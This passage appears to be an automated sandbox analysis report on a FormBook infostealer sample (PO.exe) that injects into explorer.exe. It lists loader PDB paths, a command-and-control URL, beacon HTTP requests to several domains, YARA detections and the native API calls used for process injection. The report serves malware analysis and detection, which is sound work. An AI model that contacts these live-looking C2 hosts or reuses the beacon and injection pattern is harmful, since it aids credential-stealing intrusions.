Source:	Binary string: explorer.pdbUGP source: PO.exe, 00000001.00000002.294032142.00000000028B0000.00000040.00000001.sdmp
Source:	Binary string: wscui.pdbUGP source: explorer.exe, 00000003.00000002.511710561.0000000007260000.00000002.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: PO.exe, 00000000.00000003.234541643.000000001EFF0000.00000004.00000001.sdmp, PO.exe, 00000001.00000002.293490936.0000000000B2F000.00000040.00000001.sdmp, explorer.exe, 0000000A.00000002.501687927.0000000004C80000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: PO.exe, explorer.exe
Source:	Binary string: C:\xampp\htdocs\Cryptor\1a839a6cf4cc488e888465f9ce8aa846\Loader\Loader\Release\d18g7xa93.pdb source: PO.exe, 00000000.00000002.242784001.0000000073352000.00000002.00020000.sdmp, 5t94xwjj.dll.0.dr
Source:	Binary string: explorer.pdb source: PO.exe, 00000001.00000002.294032142.00000000028B0000.00000040.00000001.sdmp
Source:	Binary string: wscui.pdb source: explorer.exe, 00000003.00000002.511710561.0000000007260000.00000002.00000001.sdmp

Source: C:\Users\user\Desktop\PO.exe	Code function: 0_2_00405301 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,	0_2_00405301
Source: C:\Users\user\Desktop\PO.exe	Code function: 0_2_00405C94 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,	0_2_00405C94
Source: C:\Users\user\Desktop\PO.exe	Code function: 0_2_004026BC FindFirstFileA,	0_2_004026BC

Source: C:\Users\user\Desktop\PO.exe	Code function: 4x nop then pop ebx	1_2_00407AFA
Source: C:\Users\user\Desktop\PO.exe	Code function: 4x nop then pop edi	1_2_00416CA5
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4x nop then pop ebx	10_2_00897AFB
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4x nop then pop edi	10_2_008A6CA5

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: www.c-voyageinc.com/r4ei/

Source: global traffic	HTTP traffic detected: GET /r4ei/?_ZA0p2=cRhAr0dy1lG+6v8jj0sxWagS9ZGCZip2Fr4SFXT7OXMmHzjmweO35OAl28FoqWQGc0rZ&GzuLH=VBZLTBc0f HTTP/1.1Host: www.websiteworlda-z.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /r4ei/?_ZA0p2=qFx0jq35EoqhqGMmxZfRcaIhnrtQSZTAjbNVWKcVQ7fc4zdL4G4zojbsIieSdo+D23N6&GzuLH=VBZLTBc0f HTTP/1.1Host: www.phorice.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

IP Address: 44.227.76.166 44.227.76.166

Source: C:\Windows\explorer.exe

Code function: 3_2_06D537A2 getaddrinfo,setsockopt,recv,

3_2_06D537A2

Source: global traffic	HTTP traffic detected: GET /r4ei/?_ZA0p2=cRhAr0dy1lG+6v8jj0sxWagS9ZGCZip2Fr4SFXT7OXMmHzjmweO35OAl28FoqWQGc0rZ&GzuLH=VBZLTBc0f HTTP/1.1Host: www.websiteworlda-z.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /r4ei/?_ZA0p2=qFx0jq35EoqhqGMmxZfRcaIhnrtQSZTAjbNVWKcVQ7fc4zdL4G4zojbsIieSdo+D23N6&GzuLH=VBZLTBc0f HTTP/1.1Host: www.phorice.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: unknown

DNS traffic detected: queries for: www.cwyxonlp.icu

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 08 Apr 2021 10:10:12 GMTServer: ApacheContent-Length: 269Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 77 65 62 73 69 74 65 77 6f 72 6c 64 61 2d 7a 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.websiteworlda-z.com Port 80</address></body></html>

Source: explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 0000000A.00000002.504257510.000000000569F000.00000004.00000001.sdmp	String found in binary or memory: http://phorice.com
Source: explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn

Source: C:\Users\user\Desktop\PO.exe

Code function: 0_2_00404EA0 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,lstrlenA,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_00404EA0

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000001.00000002.292997768.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.293202588.00000000006C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.496722732.0000000000890000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.293226365.00000000006F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.242379104.0000000002670000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000001.238704374.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.501170602.0000000004900000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.501014496.00000000048D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 1.2.PO.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.PO.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.1.PO.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO.exe.2670000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO.exe.2670000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.1.PO.exe.400000.0.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000001.00000002.292997768.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.292997768.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.293202588.00000000006C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.293202588.00000000006C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.496722732.0000000000890000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.496722732.0000000000890000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.293226365.00000000006F0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.293226365.00000000006F0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.242379104.0000000002670000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.242379104.0000000002670000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000001.238704374.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000001.238704374.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.501170602.0000000004900000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.501170602.0000000004900000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.501014496.00000000048D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.501014496.00000000048D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.PO.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.PO.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.PO.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.PO.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.1.PO.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.1.PO.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.PO.exe.2670000.1.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.PO.exe.2670000.1.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.PO.exe.2670000.1.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.PO.exe.2670000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.1.PO.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.1.PO.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_0041A060 NtClose,	1_2_0041A060
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_0041A110 NtAllocateVirtualMemory,	1_2_0041A110
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00419F30 NtCreateFile,	1_2_00419F30
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00419FE0 NtReadFile,	1_2_00419FE0
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00419F2B NtCreateFile,	1_2_00419F2B
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00419FDA NtReadFile,	1_2_00419FDA
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00419F82 NtReadFile,	1_2_00419F82
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A798F0 NtReadVirtualMemory,LdrInitializeThunk,	1_2_00A798F0
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A79860 NtQuerySystemInformation,LdrInitializeThunk,	1_2_00A79860
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A79840 NtDelayExecution,LdrInitializeThunk,	1_2_00A79840
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A799A0 NtCreateSection,LdrInitializeThunk,	1_2_00A799A0
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A79910 NtAdjustPrivilegesToken,LdrInitializeThunk,	1_2_00A79910
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A79A20 NtResumeThread,LdrInitializeThunk,	1_2_00A79A20
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A79A00 NtProtectVirtualMemory,LdrInitializeThunk,	1_2_00A79A00
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A79A50 NtCreateFile,LdrInitializeThunk,	1_2_00A79A50
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A795D0 NtClose,LdrInitializeThunk,	1_2_00A795D0
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A79540 NtReadFile,LdrInitializeThunk,	1_2_00A79540
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A796E0 NtFreeVirtualMemory,LdrInitializeThunk,	1_2_00A796E0
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A79660 NtAllocateVirtualMemory,LdrInitializeThunk,	1_2_00A79660
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A797A0 NtUnmapViewOfSection,LdrInitializeThunk,	1_2_00A797A0
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A79780 NtMapViewOfSection,LdrInitializeThunk,	1_2_00A79780
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A79710 NtQueryInformationToken,LdrInitializeThunk,	1_2_00A79710
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A798A0 NtWriteVirtualMemory,	1_2_00A798A0
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A79820 NtEnumerateKey,	1_2_00A79820
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A7B040 NtSuspendThread,	1_2_00A7B040
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A799D0 NtCreateProcessEx,	1_2_00A799D0
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A79950 NtQueueApcThread,	1_2_00A79950
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A79A80 NtOpenDirectoryObject,	1_2_00A79A80
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A79A10 NtQuerySection,	1_2_00A79A10
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A7A3B0 NtGetContextThread,	1_2_00A7A3B0
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A79B00 NtSetValueKey,	1_2_00A79B00
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A795F0 NtQueryInformationFile,	1_2_00A795F0
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A79520 NtWaitForSingleObject,	1_2_00A79520
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A7AD30 NtSetContextThread,	1_2_00A7AD30
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A79560 NtWriteFile,	1_2_00A79560
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A796D0 NtCreateKey,	1_2_00A796D0
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A79610 NtEnumerateValueKey,	1_2_00A79610
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A79670 NtQueryInformationProcess,	1_2_00A79670
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A79650 NtQueryValueKey,	1_2_00A79650
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A79FE0 NtCreateMutant,	1_2_00A79FE0
Source: C:\Windows\explorer.exe	Code function: 3_2_06D52A52 NtCreateFile,	3_2_06D52A52
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CE9840 NtDelayExecution,LdrInitializeThunk,	10_2_04CE9840
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CE9860 NtQuerySystemInformation,LdrInitializeThunk,	10_2_04CE9860
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CE95D0 NtClose,LdrInitializeThunk,	10_2_04CE95D0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CE99A0 NtCreateSection,LdrInitializeThunk,	10_2_04CE99A0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CE9540 NtReadFile,LdrInitializeThunk,	10_2_04CE9540
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CE9910 NtAdjustPrivilegesToken,LdrInitializeThunk,	10_2_04CE9910
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CE96D0 NtCreateKey,LdrInitializeThunk,	10_2_04CE96D0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CE96E0 NtFreeVirtualMemory,LdrInitializeThunk,	10_2_04CE96E0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CE9650 NtQueryValueKey,LdrInitializeThunk,	10_2_04CE9650
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CE9A50 NtCreateFile,LdrInitializeThunk,	10_2_04CE9A50
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CE9660 NtAllocateVirtualMemory,LdrInitializeThunk,	10_2_04CE9660
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CE9FE0 NtCreateMutant,LdrInitializeThunk,	10_2_04CE9FE0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CE9780 NtMapViewOfSection,LdrInitializeThunk,	10_2_04CE9780
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CE9710 NtQueryInformationToken,LdrInitializeThunk,	10_2_04CE9710
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CE98F0 NtReadVirtualMemory,	10_2_04CE98F0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CE98A0 NtWriteVirtualMemory,	10_2_04CE98A0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CEB040 NtSuspendThread,	10_2_04CEB040
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CE9820 NtEnumerateKey,	10_2_04CE9820
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CE99D0 NtCreateProcessEx,	10_2_04CE99D0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CE95F0 NtQueryInformationFile,	10_2_04CE95F0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CE9950 NtQueueApcThread,	10_2_04CE9950
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CE9560 NtWriteFile,	10_2_04CE9560
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CE9520 NtWaitForSingleObject,	10_2_04CE9520
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CEAD30 NtSetContextThread,	10_2_04CEAD30
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CE9A80 NtOpenDirectoryObject,	10_2_04CE9A80
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CE9670 NtQueryInformationProcess,	10_2_04CE9670
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CE9A00 NtProtectVirtualMemory,	10_2_04CE9A00
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CE9610 NtEnumerateValueKey,	10_2_04CE9610
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CE9A10 NtQuerySection,	10_2_04CE9A10
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CE9A20 NtResumeThread,	10_2_04CE9A20
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CE97A0 NtUnmapViewOfSection,	10_2_04CE97A0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CEA3B0 NtGetContextThread,	10_2_04CEA3B0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CE9760 NtOpenProcess,	10_2_04CE9760
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CE9770 NtSetInformationFile,	10_2_04CE9770
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CEA770 NtOpenThread,	10_2_04CEA770
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CE9B00 NtSetValueKey,	10_2_04CE9B00
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CEA710 NtOpenProcessToken,	10_2_04CEA710
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CE9730 NtQueryVirtualMemory,	10_2_04CE9730
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_008AA060 NtClose,	10_2_008AA060
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_008AA110 NtAllocateVirtualMemory,	10_2_008AA110
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_008A9FE0 NtReadFile,	10_2_008A9FE0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_008A9F30 NtCreateFile,	10_2_008A9F30
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_008A9F82 NtReadFile,	10_2_008A9F82
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_008A9FDA NtReadFile,	10_2_008A9FDA
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_008A9F2B NtCreateFile,	10_2_008A9F2B

Source: C:\Users\user\Desktop\PO.exe

Code function: 0_2_0040314A EntryPoint,#17,OleInitialize,SHGetFileInfoA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,GetCommandLineA,GetModuleHandleA,CharNextA,OleUninitialize,ExitProcess,lstrcatA,CreateDirectoryA,lstrcatA,lstrcatA,DeleteFileA,GetModuleFileNameA,lstrcmpiA,CopyFileA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,

0_2_0040314A

Source: C:\Users\user\Desktop\PO.exe	Code function: 0_2_004046A7	0_2_004046A7
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00401030	1_2_00401030
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_0041E1EC	1_2_0041E1EC
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_0041E1F8	1_2_0041E1F8
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_0041EADA	1_2_0041EADA
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00402D90	1_2_00402D90
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00409E40	1_2_00409E40
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00409E3D	1_2_00409E3D
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_0041D680	1_2_0041D680
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00402FB0	1_2_00402FB0
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A620A0	1_2_00A620A0
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00B020A8	1_2_00B020A8
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A4B090	1_2_00A4B090
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00B028EC	1_2_00B028EC
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00B0E824	1_2_00B0E824
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00AF1002	1_2_00AF1002
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A54120	1_2_00A54120
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A3F900	1_2_00A3F900
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00B022AE	1_2_00B022AE
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A6EBB0	1_2_00A6EBB0
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00AF03DA	1_2_00AF03DA
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00AFDBD2	1_2_00AFDBD2
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00B02B28	1_2_00B02B28
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A4841F	1_2_00A4841F
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00AFD466	1_2_00AFD466
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A62581	1_2_00A62581
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A4D5E0	1_2_00A4D5E0
